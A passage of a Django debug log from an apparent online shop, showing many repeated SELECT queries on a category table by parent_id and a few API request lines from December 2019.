20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:38:25,970 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:38:25,972 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:38:25,973 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-16 07:38:25,974 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:38:25] "GET /api/v1/categories/big-fire HTTP/1.0" 200 15396 [16/Dec/2019 07:38:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:39:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:39:09,677 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:39:09,686 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:39:09,690 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:39:09,693 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:39:09,696 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:39:09,701 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:39:09,703 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:39:09,706 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:39:09,708 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:39:09,710 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:39:09,712 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:39:09,715 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:39:09,717 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:39:09,719 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:39:09,722 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:39:09,724 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:39:09,726 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:39:09,728 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:39:09,730 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:39:09,733 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:39:09,735 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:39:09,738 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:39:09,740 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:39:09,742 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:39:09,745 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:39:09,747 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:39:09,749 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:39:09,751 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:39:09,753 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:39:09,755 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:39:09,757 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:39:09,760 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:39:09,762 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:39:09,764 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:39:09,767 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:39:09,770 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:39:09,771 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:39:09,773 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:39:09,775 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:39:09,777 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:39:09,779 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:39:09,783 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:39:09,785 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:39:09,786 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:39:09,788 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:39:09,790 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:39:09,793 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:39:09,795 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:39:09,797 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:39:09,799 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:39:09,801 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:39:09,803 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:39:09,805 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:39:09,808 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:39:09,810 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:39:09,812 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:39:09,816 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:39:09,817 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:39:09,820 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:39:09,821 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:39:09,823 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:39:09,825 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:39:09,828 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", 